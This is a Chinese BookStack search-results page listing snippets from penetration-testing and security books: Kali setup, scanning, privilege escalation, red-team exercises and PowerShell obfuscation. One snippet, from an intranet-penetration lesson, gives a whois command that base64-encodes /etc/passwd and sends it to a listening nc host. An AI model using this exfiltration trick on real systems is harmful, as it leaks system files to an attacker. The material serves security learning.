书栈网 · BookStack 本次搜索耗时 0.025 秒,为您找到 53593 个相关结果.
  • 6.8. 参考链接

    1054 2020-01-25 《Web安全学习笔记》
    6.8. 参考链接 6.8.1. Windows 6.8.1.1. 域渗透 6.8.2. RedTeam 6.8.3. 内网 6.8. 参考链接 6.8.1. Windows Windows内网渗透提权 文件寄生 NTFS文件流实际应用 Windows中常见后门持久化方法总结 LOLBAS 6.8.1.1. 域渗透 绕过...
  • 第一章 安装和启动Kali

    第一章 安装和启动Kali 简介 1.1 安装到硬盘 准备 操作步骤 1.2 安装到U盘或持久存储器中 准备 操作步骤 1.3 在 VirtualBox 中安装 准备 操作步骤 1.4 安装 VMware Tools 准备 操作步骤 工作原理 1.5 修复启动画面 操作步骤 1.6 启动网络服务 准备 操作步骤 1.7...
  • 具有创新性的的入侵行动

    具有创新性的的入侵行动 具有创新性的的入侵行动 作为公司的内部红队可以有机会参加具有创新性的的入侵行动。我最喜欢的行动之一是模拟勒索软件。在过去,我们被允许在 WannaCry 大面积爆发的时期进行模拟勒索软件行动。随着加密软件和勒索软件越来越受欢迎,我们确实需要有能力测试我们的业务恢复和遇难恢复程序。我们在现实生活中见证了这一点,WannaCry ...
  • Github

    Github Truffle Hog Github Github 是一个有惊人数据的宝库。在一些渗透测试和红队评估中,我们能够获得密码,API 密钥,旧的源代码,内部主机名/ IPs 以及更多。这些要么导致直接攻击沦陷,要么帮助发动另一场攻击。我们看到的是,许多开发人员要么将代码保存到错误的仓库(将其发送到他们的公开仓库而不是公司的私有仓库),要么...
  • 缓解由客户端发起的重新协商攻击

    缓解由客户端发起的重新协商攻击 缓解由客户端发起的重新协商攻击 TLS 协议允许客户端重新协商 TLS 会话的某些方面。不幸的是,会话重新协商需要非等比的服务器端的资源,这使得它成为拒绝服务攻击的潜在媒介。 为了减轻这个的影响,重新协商被限制为每 10 分钟三次。当超过该阈值时,tls.TLSSocket 实例会发出一个错误。这些限制是可配置的:...
  • 第五章 自动化扫描

    第五章 自动化扫描 简介 5.1 使用 Nikto 扫描 操作步骤 工作原理 5.2 使用 Wapiti 发现漏洞 操作步骤 工作原理 5.3 使用 OWASP ZAP 扫描漏洞 准备 操作步骤 工作原理 更多 5.4 使用 w3af 扫描 操作步骤 工作原理 更多 5.5 使用 Vega 扫描器 操作步骤 工作原理 5...
  • powershell(10)-混淆

    powershell(10)-混淆 实例 工具 Invoke-Obfuscation Empire powershell(10)-混淆 Powershell的混淆目前已经使用的越来越多,国内外也有了较多的研究,在今年的BH大会上也有对应的议题,关注点是反混淆,那么里面的一些姿势很值得我们学习,我们提供一些混淆实例,来让大家对于PS的混淆做到...
  • 网络安全

    常见的安全误区 黑客、网络安全只存在于虚拟世界 我的程序部署在内网,没事儿 我的系统打上了所有的补丁,不会被入侵 密码用MD5加密了,拖了库也没关系 交易使用了短信验证码,绝对可靠 主流攻击方式 常见的安全误区 黑客、网络安全只存在于虚拟世界 如果我说以后黑客不但可以控制你的汽车开窗、刹车,甚至还能远程“强奸”,你信吗? 许多初创公...
  • 第五十三课:内网渗透中的文件传输

    利用whois传输文件: 传输机: root@john :~# whois - h 127.0 . 0.1 - p 4444 `cat /etc/passwd | base64` 接受机: root@john :/ tmp # nc -l -v -p 4444 | sed "s/ //g" | base64 -d ...
  • 第七章 权限提升

    第七章 权限提升 简介 7.1 使用模拟令牌 准备 操作步骤 工作原理 7.2 本地提权攻击 准备 操作步骤 工作原理 7.3 掌握社会工程工具包(SET) 操作步骤 工作原理 更多 7.4 收集受害者数据 准备 操作步骤 工作原理 更多 7.5 清理踪迹 准备 操作步骤 工作原理 7.6 创建永久后门 准备 操...